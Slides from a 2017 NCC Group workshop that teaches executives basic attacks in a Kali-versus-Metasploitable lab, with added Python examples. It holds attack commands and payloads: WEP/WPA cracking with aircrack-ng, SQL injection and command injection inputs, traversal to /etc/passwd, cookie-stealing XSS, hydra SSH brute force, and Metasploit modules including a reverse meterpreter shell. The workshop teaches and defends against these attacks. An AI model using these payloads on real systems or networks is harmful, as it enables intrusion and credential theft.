Hacking for Executives
Basic Hacks Used by Real World Attackers
North Texas Cyber Security Conference
November 10th, 2017
Tony Cargile and Matt Nash
Agenda
• Introductions
• Session 1
  • Getting the Lab Set Up
  • Configuring our Wifi Card
  • Attacking WEP protected routers
  • Brute forcing WPA protected routers
  • Finish Up With A Q&A
• Session 2
  • Enumeration
  • Web Application Attacks
  • Brute Force Attacks
  • Accessing Backdoors
  • Exploiting Known Vulnerabilities
~ tony$ whoami
• Principal Security Consultant at NCC Group
• Austin Office
• Specializing in Application Security and Security Development LifeCycle
• National Conferences on DANE and SDLC
• Background in Development
• Bachelor of Science in Computer Science from University of Texas at Austin
• Born and raised in Fort Worth, but don’t hold that against me
~ matt$ whoami
• Security Consultant at NCC Group
• Austin Office
• Specializing in Application Security, Infrastructure Assessment,
and Forensics
• Certified Digital Forensic Investigator and Incident
Responder
• Background in System Administration
• Bachelor of Science in Food & Resource Economics from
University of Florida
• Born and raised in Florida - sometimes referred to as Florida Man
• (only some of the news stories are true)
What is this training?
• This is not a BlackHat Training
• No technical experience needed
• The purpose of this training is to teach basic attacks and tools to managers and executives in decision making roles within the security realm.
• All the tools and labs are open source and available online
The Lab
• Everyone will be constructing their own “hacker lab” within their computer.
• The Lab will consist of two virtual machines, controlled by VMware Player:
  • Kali Linux: A common attacker Linux OS
  • Metasploitable: A purposefully vulnerable Linux OS
• This course is designed for Windows, but 100% possible on Macs and Linux
The Wifi Lab
• SSID: NCC Lab 1
• WPA Password Protected
• BSSID: 00:1F:33:E5:2C:A1
• Password: ?
• SSID: NCC Lab 2
• WEP Protected
• BSSID: 68:7F:74:C4:D8:64
• Password: ?
Setting Up the Lab
Opening the USB
• 3 Files
• Kali Linux VM – 7zipped
• Metasploitable 2 VM – zipped
• VMware Player Windows Installer
VMware Install
• First, start by running the VMware installer
• Accept the EULA
• No need to install the Enhanced Keyboard Driver
• Determine whether you want to give VMware your data
Run VMware Player Once Installed
• Once installed, on first run it will ask for a license
Extracting the VMs
• Extract to an easy to locate folder.
• Take note of where you extracted
• Don’t put it on the USB
Installing 7-Zip
• Right-click on the 7-Zip installer and click “Run as administrator”
• Enter administrator password and click “Yes”
• Click “Install”
• Open the 7-Zip program and navigate to the folder containing the Kali archive
• Select the Kali archive and click “Extract”
• Choose an extraction location and click “OK”
Opening the VMs
Configuring the VMs
• This is an important step for 2 reasons:
1. We need to make sure that our VMs can talk to each other.
2. We need to make sure that we don’t expose our VMs to the world.
• Verify that the Network Adapter says “NAT”
• With NAT, both VMs sit on a private virtual network behind the host and go out through the host’s address, so Kali can reach Metasploitable while nothing else on the conference network can reach either VM. A “Bridged” adapter would put the deliberately vulnerable Metasploitable directly on the local network, which is exactly what we want to avoid.
Powering On Metasploitable
Installing VMware Tools
Logging Into Metasploitable
• Default credentials:
• Username: msfadmin
• Password: msfadmin
Logged into Metasploitable
Getting the IP Address
INPUT: ifconfig
• Note the IP Address: we will need it later!
Powering on Kali
• You will go through the same steps as when you powered on Metasploitable.
• Click “I copied it”
• Don’t change the keyboard timeout
• Install VMware tools.
Kali Starting Up
Enable Full Screen
Log into Kali
• Default credentials:
• Username: root
• Password: toor
Kali on Startup
Opening the terminal
• Unlike Windows, the task bar is on the top
• Kali now has the quick start bar on the left
• Click the black terminal icon
Getting Kali’s IP Address
INPUT: ifconfig
• Note the IP Address: we will need it later!
Wireless Attacks
Connect USB WiFi Adapter to Kali
• Plug in the provided USB wireless adapter and click the “Show devices” icon in the top-right
• Mouse over the USB icon to display the connected USB device
• Right-click on the USB icon and click “Connect (Disconnect from host)”
Verify Kali Sees the WiFi Adapter
• Open a Terminal window and use the `ip addr` command to list network interfaces; note the name of the wireless one (normally wlan0)
INPUT: ip addr
Place WiFi Interface Into Monitor Mode
Use `airmon-ng` to place the wlan0 interface into “monitor” mode so it captures every frame on the channel rather than only frames addressed to it. The monitor interface is normally named wlan0mon; if `ip addr` showed a different interface name, use that one here.
INPUT: airmon-ng start wlan0
Kill Problematic Processes
Use `airmon-ng` to kill processes (NetworkManager, wpa_supplicant, dhclient) which may cause problems with wireless interception. If the interface keeps dropping out of monitor mode, run this step before `airmon-ng start wlan0` rather than after it.
INPUT: airmon-ng check kill
Scan for Nearby Access Points
Use `airodump-ng` to search for nearby wireless access points
INPUT: airodump-ng wlan0mon
Nearby Wireless Access Points
We see two interesting access points – one with WEP encryption (NCC Lab 2) and another with WPA encryption (NCC Lab 1). Note the BSSID and the channel (CH column) of each; both are needed for the captures that follow.
Cracking WEP
Capturing Wireless Traffic
Use `airodump-ng` to capture traffic to/from the identified WEP-encrypted access point, locked to its channel and saving only the initialization vectors (IVs) that the WEP attack needs. Create the output folder first; airodump-ng does not create it for you.
INPUT: mkdir -p Desktop/NCC-Lab-2
INPUT: airodump-ng -c 6 --bssid 68:7F:74:C4:D8:64 --ivs -w Desktop/NCC-Lab-2/NCC-Lab-2_ivs wlan0mon
Leave this running. The #Data column counts captured IVs; the attack needs tens of thousands of them, so on a quiet access point this takes a while.
Cracking the WEP Key
In a second terminal (the capture keeps running), use `aircrack-ng` against the captured wireless data
INPUT: aircrack-ng Desktop/NCC-Lab-2/NCC-Lab-2_ivs-01.ivs
`aircrack-ng` has cracked the WEP key used to encrypt data to/from this wireless access point. If it reports that it needs more IVs, let the capture run longer and try again; no password guessing is involved, the key falls out of the captured IVs because WEP’s design is broken.
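The reason a pile of captured IVs is enough, as an added example that is not part of the NCC slides: WEP encrypts every frame with RC4 keyed by a 3-byte IV followed by the shared key, and sends the IV in the clear. With only 2^24 IVs the same keystream is reused, and two frames under one IV cancel each other out. The key, IV and both plaintext frames below are constructed; this shows the basic keystream-reuse flaw, not the PTW statistical attack that aircrack-ng actually runs over the .ivs file.

```python
"""WEP keystream reuse demo (added example; key, IV and frames are constructed)."""


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4: key scheduling, then XOR the PRGA keystream onto data."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(wep_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP frame body: cleartext 3-byte IV, then RC4(IV || key, plaintext).
    (A real frame also carries a CRC-32 ICV; omitted here.)"""
    return iv + rc4(iv + wep_key, plaintext)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def recover_from_iv_reuse(frame_a: bytes, frame_b: bytes, known_plaintext_a: bytes):
    """Two frames with the same IV share a keystream, so
    C_a XOR C_b == P_a XOR P_b.  One known plaintext (e.g. a predictable ARP
    request) yields the other, and XORing it back yields the keystream, which
    then decrypts any frame sent under that IV."""
    iv_a, ct_a = frame_a[:3], frame_a[3:]
    iv_b, ct_b = frame_b[:3], frame_b[3:]
    if iv_a != iv_b:
        raise ValueError("different IVs: no keystream reuse to exploit")
    plaintext_b = xor(xor(ct_a, ct_b), known_plaintext_a)
    keystream = xor(ct_a, known_plaintext_a)
    return plaintext_b, keystream


def seconds_until_iv_repeat(frames_per_second: int) -> float:
    """How long a busy access point takes to burn through all 2^24 IVs."""
    return 2 ** 24 / frames_per_second


# Constructed 40-bit WEP key and one IV that the AP happens to reuse.
KEY = bytes.fromhex("0badc0ffee")
IV = bytes.fromhex("010203")
P_A = b"ARP who-has 10.0.0.1, tell 10.0.0.7 "          # guessable traffic
P_B = b"wifi password: hunter2".ljust(len(P_A), b" ")  # the frame we want

if __name__ == "__main__":
    frame_a = wep_encrypt(KEY, IV, P_A)
    frame_b = wep_encrypt(KEY, IV, P_B)
    recovered, keystream = recover_from_iv_reuse(frame_a, frame_b, P_A)
    print("recovered:", recovered)
    print("IV space exhausted at 1000 frames/s after %.1f hours"
          % (seconds_until_iv_repeat(1000) / 3600))
```

The attacker never touched the key here: the same reuse that lets two frames decrypt each other is what the statistical attacks generalise, which is why the slide only needs to sit and collect IVs.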
Bruteforcing WPA
Capturing Wireless Traffic
Use `airodump-ng` to capture traffic to/from the identified WPA-encrypted access point. This time the full frames are saved (no `--ivs`), because the attack works on the WPA 4-way handshake that is exchanged when a client connects.
INPUT: mkdir -p Desktop/NCC-Lab-1
INPUT: airodump-ng -c 11 --bssid 00:1F:33:E5:2C:A1 -w Desktop/NCC-Lab-1/NCC-Lab-1 wlan0mon
Keep capturing until the top line of the airodump-ng screen shows “WPA handshake: 00:1F:33:E5:2C:A1”, which means a client joined (or re-joined) and the handshake was recorded. Without it, aircrack-ng will report that no valid WPA handshake was found.
Cracking the WPA Key
Use `aircrack-ng` against the captured handshake with a wordlist. On Kali the rockyou list ships compressed, so unpack it once first.
INPUT: gunzip /usr/share/wordlists/rockyou.txt.gz
INPUT: aircrack-ng -b 00:1F:33:E5:2C:A1 -w /usr/share/wordlists/rockyou.txt Desktop/NCC-Lab-1/NCC-Lab-1-01.cap
`aircrack-ng` is running a dictionary attack: each candidate passphrase from “rockyou” is stretched into a key (PBKDF2, 4096 rounds of HMAC-SHA1, salted with the SSID) and checked against the captured handshake. This is why a passphrase that is not in any wordlist survives the attack: WPA itself is not broken here, the password is.
`aircrack-ng` has cracked the WPA key used to encrypt data to/from this wireless access point
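What aircrack-ng is doing for each wordlist entry, as an added example that is not code from the slides: derive the PMK from the candidate passphrase and SSID, expand it to the PTK with both MAC addresses and both nonces, and check the handshake MIC. The SSID and BSSID come from the lab slides; the client MAC, the nonces, the EAPOL frame bytes, the true passphrase and the candidate list are constructed so the script runs offline without a capture file. Key descriptor version 2 (WPA2/CCMP, HMAC-SHA1 MIC) is assumed.

```python
"""WPA/WPA2-PSK dictionary attack, the way aircrack-ng checks each candidate.
Added example: everything except the SSID and BSSID is constructed."""
import hashlib
import hmac

SSID = b"NCC Lab 1"                               # from the slides
AP_MAC = bytes.fromhex("001F33E52CA1")            # BSSID from the slides
STA_MAC = bytes.fromhex("0242AC110002")           # constructed client MAC
ANONCE = hashlib.sha256(b"anonce").digest()       # constructed 32-byte nonces
SNONCE = hashlib.sha256(b"snonce").digest()
# Constructed stand-in for handshake message 2 with its 16-byte MIC field
# zeroed (aircrack-ng zeroes the MIC field before computing its own).
EAPOL_FRAME = bytes(range(99))


def pmk(passphrase: str, ssid: bytes) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
    This is the slow step, and why every wordlist entry costs real CPU."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def ptk(pmk_: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512: expand the PMK with both MACs and both nonces."""
    b = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):
        out += hmac.new(pmk_, b"Pairwise key expansion" + b"\x00" + b + bytes([i]),
                        hashlib.sha1).digest()
    return out[:64]


def eapol_mic(ptk_: bytes, frame: bytes) -> bytes:
    """Descriptor version 2: MIC = HMAC-SHA1(KCK, frame)[:16], KCK = PTK[:16]."""
    return hmac.new(ptk_[:16], frame, hashlib.sha1).digest()[:16]


def mic_for(passphrase: str) -> bytes:
    """Full chain for one candidate: passphrase -> PMK -> PTK -> MIC."""
    return eapol_mic(ptk(pmk(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE),
                     EAPOL_FRAME)


def dictionary_attack(target_mic: bytes, wordlist):
    """Return the first passphrase whose derived MIC matches the captured one,
    or None when the passphrase is not in the list (the attack simply fails)."""
    for candidate in wordlist:
        if hmac.compare_digest(mic_for(candidate), target_mic):
            return candidate
    return None


# Constructed "captured" MIC; in practice it is read out of the .cap file.
TRUE_PASSPHRASE = "dallas2017"
CAPTURED_MIC = mic_for(TRUE_PASSPHRASE)
WORDLIST = ["password", "123456789", "iloveyou", "dallas2017", "letmein"]

if __name__ == "__main__":
    print("recovered passphrase:", dictionary_attack(CAPTURED_MIC, WORDLIST))
```

Because the SSID is the salt, precomputed tables only help against common network names, and because each guess costs 4096 HMAC rounds the attacker’s rate is bounded by CPU; a long random passphrase that is not in any wordlist is out of reach of this attack.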
Web Application Attacks
Open the Web Browser
• Select the orange Firefox ESR icon
• Can also be selected by going to Applications
Browse to Metasploitable
• Input the IP Address of Metasploitable into the URL Bar
Welcome to DVWA
Turn on Easy Mode (DVWA Security → “low”, the level with no input filtering)
The Reset Button (Setup / Reset DB recreates the database; use it if a lab page gets stuck)
SQL Injection
• What is it?
• How prevalent is it?
• How much damage can it cause?
• Error messages are great resources for Attackers!
DVWA’s low-security page pastes the User ID field straight into `SELECT first_name, last_name FROM users WHERE user_id = '$id'`. The first input closes the quote and adds a condition that is true for every row (`1=1+''` still evaluates to true in MySQL), so every user is returned:
INPUT: ' or 1=1+'
The second input appends a UNION that selects the same number of columns (two) from the `users` table, so usernames and password hashes come back in the same two output fields:
INPUT: ' UNION ALL SELECT user,password from users where 1=1+'
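The two payloads above run against a small SQLite stand-in for DVWA’s `users` table, as an added example that is not code from the slides or from DVWA. The rows are constructed (MD5 of a few weak passwords, the way DVWA stores them); SQLite evaluates `1=1+''` the same way MySQL does for this purpose. The vulnerable lookup builds the query by string concatenation exactly as the low-security page does; the safe lookup uses a placeholder.

```python
"""DVWA-style SQL injection against an in-memory SQLite table (added example)."""
import hashlib
import sqlite3

PAYLOAD_TAUTOLOGY = "' or 1=1+'"
PAYLOAD_UNION = "' UNION ALL SELECT user,password from users where 1=1+'"
ADMIN_HASH = hashlib.md5(b"password").hexdigest()


def make_db() -> sqlite3.Connection:
    """Constructed users table shaped like DVWA's (id, names, login, md5 hash)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT, "
        "user TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?,?,?,?,?)", [
        (1, "admin", "admin", "admin", ADMIN_HASH),
        (2, "Gordon", "Brown", "gordonb", hashlib.md5(b"abc123").hexdigest()),
        (3, "Hack", "Me", "1337", hashlib.md5(b"charley").hexdigest()),
    ])
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, user_id: str):
    """DVWA low: the field is pasted into the SQL text, so quotes in the
    input end the literal and the rest becomes SQL."""
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(query).fetchall()


def lookup_safe(conn: sqlite3.Connection, user_id: str):
    """Parameterised: the value is bound after parsing and can never change
    the query's structure, whatever characters it contains."""
    return conn.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?", (user_id,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("normal:   ", lookup_vulnerable(db, "1"))
    print("tautology:", lookup_vulnerable(db, PAYLOAD_TAUTOLOGY))
    print("union:    ", lookup_vulnerable(db, PAYLOAD_UNION))
    print("safe:     ", lookup_safe(db, PAYLOAD_UNION))
```

The UNION result is the one that matters to an executive: two output fields intended for a first and last name are now carrying every login and password hash in the table, and the application has no way to tell.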
Command Injection
• What is it?
• How prevalent is it?
• How much damage can it cause?
• Similar to SQL Injection, but instead of injecting into a SQL database, we are injecting into a command that the web application server runs.
DVWA’s ping page passes the address field onto a shell command line that starts with `ping`. A semicolon ends that command, and whatever follows runs as a second command with the web server’s privileges.
INPUT: 8.8.8.8
INPUT: 8.8.8.8; ls
INPUT: 8.8.8.8; whoami
The result (www-data on Metasploitable) is the account every later command will run as.
INPUT: 8.8.8.8; cat /etc/passwd
The list of local accounts is useful later: the `sys` user we brute force over SSH is one of them.
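The ping page’s bug reproduced in Python, as an added example that is not code from the slides or from DVWA. `echo` stands in for `ping` so the script runs offline, and the injected command is an `echo INJECTED` rather than `whoami` so the result is deterministic; both substitutions are constructed. The fix has two independent layers: an argument list instead of a shell string, and validation that the field is actually an IP address.

```python
"""Command injection: vulnerable shell string vs. argv list plus validation.
Added example; `echo` is a constructed stand-in for `ping`."""
import ipaddress
import subprocess

PAYLOAD = "8.8.8.8; echo INJECTED"


def ping_vulnerable(target: str) -> str:
    """Same shape as the DVWA page: the field is glued onto a command line
    that /bin/sh parses, so ';' starts a second command."""
    cmd = "echo pinging " + target
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def ping_noshell(target: str) -> str:
    """Layer 1: no shell.  The value is a single argv element, so ';' is just
    a character in the argument and nothing extra runs."""
    proc = subprocess.run(["echo", "pinging", target], capture_output=True, text=True)
    return proc.stdout


def ping_safe(target: str) -> str:
    """Layer 2: reject anything that is not an IP address before it gets
    anywhere near a process.  ipaddress raises ValueError on the payload."""
    ip = ipaddress.ip_address(target)
    return ping_noshell(str(ip))


def was_injected(output: str) -> bool:
    """True if the injected second command actually executed (its output is
    on its own line rather than echoed back as part of the argument)."""
    return "INJECTED" in output.splitlines()


if __name__ == "__main__":
    print("vulnerable:", repr(ping_vulnerable(PAYLOAD)))
    print("no shell:  ", repr(ping_noshell(PAYLOAD)))
    try:
        ping_safe(PAYLOAD)
    except ValueError as e:
        print("validated: rejected,", e)
```

With the shell string the output has two lines because two commands ran; with the argv list the whole payload is echoed back as one literal argument; with validation it never runs at all.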
Local File Inclusion/Directory Traversal
• What is it?
• How prevalent is it?
• How much damage can it cause?
DVWA’s file inclusion page takes a file name from the `page` parameter in the URL and includes that file. Nothing stops the name from containing `../`, so the request can climb out of the folder the page lives in.
INPUT: test.php
A file that does not exist; watch the PHP warning, which gives away the directory path on disk.
INPUT: ../../phpinfo.php
Two levels up from the vulnerable page is DVWA’s own phpinfo.php, which prints the server’s PHP configuration.
INPUT: ../../../../../../../../etc/passwd
Enough `../` to reach the root of the filesystem (extra ones are harmless), then the system account list, which the web server account is allowed to read.
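How the traversal input escapes the web root, and the check that stops it, as an added example that is not code from the slides or from DVWA. The web root is a constructed temporary directory containing one page; the vulnerable resolver joins and normalises the path without ever checking where it landed, the safe one resolves it and requires the result to stay inside the page’s directory.

```python
"""Directory traversal: path resolution with and without a containment check.
Added example; the web root is a constructed temporary directory."""
import os
import tempfile

# Constructed web root: <tmp>/vulnerabilities/fi/include.php
WEB_ROOT = tempfile.mkdtemp(prefix="dvwa-fi-")
PAGE_DIR = os.path.join(WEB_ROOT, "vulnerabilities", "fi")
os.makedirs(PAGE_DIR)
with open(os.path.join(PAGE_DIR, "include.php"), "w") as fh:
    fh.write("<?php echo 'hello'; ?>")

TRAVERSAL = "../../../../../../../../etc/passwd"


def resolve_vulnerable(page: str) -> str:
    """Join the user's value onto the page directory and normalise it.
    '..' components walk upward until they hit '/', so the result can be
    anywhere on disk."""
    return os.path.normpath(os.path.join(PAGE_DIR, page))


def resolve_safe(page: str) -> str:
    """Resolve symlinks and '..' first, then insist the real path is still
    under the page directory.  String prefix checks are not enough (they
    accept '/var/www/fi-evil' for root '/var/www/fi'); commonpath is."""
    root = os.path.realpath(PAGE_DIR)
    candidate = os.path.realpath(os.path.join(PAGE_DIR, page))
    if os.path.commonpath([root, candidate]) != root:
        raise PermissionError(f"{page!r} resolves outside {root}")
    return candidate


def read_page(page: str) -> str:
    """What the fixed include would do: only files under PAGE_DIR are opened."""
    with open(resolve_safe(page)) as fh:
        return fh.read()


if __name__ == "__main__":
    print("vulnerable resolves to:", resolve_vulnerable(TRAVERSAL))
    print("safe page:", read_page("include.php"))
    for bad in (TRAVERSAL, "../../phpinfo.php"):
        try:
            resolve_safe(bad)
        except PermissionError as e:
            print("blocked:", e)
```

An allow-list of page names is stronger still, since then the user never supplies a path at all; the containment check is the minimum that makes the `../` trick fail.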
Cross Site Scripting
• What is it?
• How prevalent is it?
• How much damage can it cause?
Stored Cross Site Scripting
DVWA’s guestbook saves whatever is typed into the message field and replays it, unescaped, to everyone who views the page afterwards; the browser treats the saved text as part of the page.
INPUT: <img src="http://bit.ly/2dtWOWN">
INPUT: <script>alert(document.cookie);</script>
The alert shows the victim’s session cookie. A real attacker would send it to a server they control instead of popping it up, then use it to act as that user; marking the cookie HttpOnly keeps it out of reach of scripts.
DON’T DO THIS: <script>document.location="https://nccgroup.trust";</script>
Because the message is stored, every later visit to the guestbook runs the redirect before anyone can click anything, and the only way back is the reset button.
Reflected Cross Site Scripting
The same payloads work on the reflected page, but there the script travels in the request (the URL) and is echoed straight back rather than stored: the victim has to be tricked into opening a crafted link, and nothing persists on the server.
Network Penetration Attacks
Enumeration
Scan every TCP port on Metasploitable and ask nmap to identify the service and version behind each open one. Substitute the address you noted from `ifconfig`; 192.168.132.128 is the presenters’ lab value. `-p-` covers all 65535 ports, so this takes a few minutes.
INPUT: nmap -sV -p- 192.168.132.128
The version strings are what the rest of the session is built on: vsftpd 2.3.4 on port 21, distccd on port 3632 and a Java RMI registry on port 1099 each map to a Metasploit module below.
Brute Forcing Passwords
Use `hydra` to try every password in John the Ripper’s default list against the `sys` account (one of the accounts seen in /etc/passwd earlier) over SSH, four connections at a time.
INPUT: hydra -l sys -P /usr/share/john/password.lst -t 4 192.168.132.128 ssh
Log in with the password hydra found.
INPUT: ssh sys@192.168.132.128
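The defender’s view of that hydra run, as an added example that is not code from the slides: a few sshd log lines of the shape Metasploitable’s /var/log/auth.log would hold (constructed, with the presenters’ lab addresses), and a detector that counts failed logins per source address inside a sliding window and flags the burst that `-t 4` produces, including the success that follows it.

```python
"""SSH brute-force detection over constructed auth.log lines (added example)."""
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample: six quick failures from Kali, then a success, then one
# ordinary typo from the host machine that should not be flagged.
AUTH_LOG = """\
Nov 10 14:02:01 metasploitable sshd[4411]: Failed password for sys from 192.168.132.129 port 50211 ssh2
Nov 10 14:02:01 metasploitable sshd[4413]: Failed password for sys from 192.168.132.129 port 50212 ssh2
Nov 10 14:02:02 metasploitable sshd[4415]: Failed password for sys from 192.168.132.129 port 50213 ssh2
Nov 10 14:02:02 metasploitable sshd[4417]: Failed password for sys from 192.168.132.129 port 50214 ssh2
Nov 10 14:02:03 metasploitable sshd[4419]: Failed password for sys from 192.168.132.129 port 50215 ssh2
Nov 10 14:02:03 metasploitable sshd[4421]: Failed password for sys from 192.168.132.129 port 50216 ssh2
Nov 10 14:02:04 metasploitable sshd[4423]: Accepted password for sys from 192.168.132.129 port 50217 ssh2
Nov 10 14:10:30 metasploitable sshd[4501]: Failed password for msfadmin from 192.168.132.1 port 41022 ssh2
Nov 10 14:10:41 metasploitable sshd[4503]: Accepted password for msfadmin from 192.168.132.1 port 41023 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+"
)


def parse(line: str, year: int = 2017):
    """Return (timestamp, 'Failed'|'Accepted', user, ip) or None for other lines.
    syslog timestamps carry no year, so one is supplied."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]


def detect_bruteforce(log_text: str, threshold: int = 5, window_seconds: int = 60):
    """Map each source IP that reaches `threshold` failures inside any
    `window_seconds` span to (failures_in_window, followed_by_success)."""
    recent = defaultdict(deque)   # ip -> timestamps of failures still in window
    flagged = {}
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        ts, result, _user, ip = rec
        if result == "Failed":
            q = recent[ip]
            q.append(ts)
            while (ts - q[0]).total_seconds() > window_seconds:
                q.popleft()
            if len(q) >= threshold:
                flagged[ip] = (len(q), False)
        elif ip in flagged:
            # A success right after a burst of failures is the case to page on:
            # the guessing worked.
            flagged[ip] = (flagged[ip][0], True)
    return flagged


if __name__ == "__main__":
    for ip, (count, success) in detect_bruteforce(AUTH_LOG).items():
        print(f"{ip}: {count} failures in window, login succeeded: {success}")
```

The same logic, with a lower threshold per account and a lockout or rate limit on the SSH side, is what turns a ten-minute hydra run into an alert and a dead end; note that `-t 4` keeps the attempt rate low enough that a per-second limit alone would not catch it.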
Running Metasploit
INPUT: msfconsole
Accessing a Backdoor
The vsftpd 2.3.4 build on Metasploitable contains a backdoor: an FTP login whose username contains “:)” opens a root shell on port 6200, and this module simply triggers it and connects.
INPUT: use exploit/unix/ftp/vsftpd_234_backdoor
INPUT: show options
INPUT: set RHOST 192.168.132.128
INPUT: run
INPUT: id
INPUT: whoami
INPUT: ls
Exploiting a Known Vulnerability
distccd on port 3632 compiles whatever it is sent with no authentication (CVE-2004-2687), so the module hands it a command instead of source code. The shell comes back as the `daemon` user, not root.
INPUT: use exploit/unix/misc/distcc_exec
INPUT: show options
INPUT: set RHOST 192.168.132.128
INPUT: run
INPUT: id
INPUT: ls
Exploiting Java RMI Using Meterpreter
The RMI registry on port 1099 will load classes from a URL the client names, so Metasploit serves a malicious class and the server runs it. LHOST is Kali’s own address (192.168.132.129 in the presenters’ lab; use the one you noted from `ifconfig`) so that the Meterpreter payload knows where to connect back.
INPUT: use exploit/multi/misc/java_rmi_server
INPUT: show options
INPUT: set RHOST 192.168.132.128
INPUT: set LHOST 192.168.132.129
INPUT: set PAYLOAD java/meterpreter/reverse_tcp
INPUT: run
Q&A
Contact Us
• Mitchell Merrick
• Strategic Account Manager
• (512) 431-6213
• Tony Cargile
• Principal Security Consultant
• Matt Nash
• Security Consultant
• www.nccgroup.trust
• https://www.linkedin.com/company/ncc-group/
• https://twitter.com/NCCGroupplc
• https://www.facebook.com/NCCGroupplc/
• https://plus.google.com/+nccgroup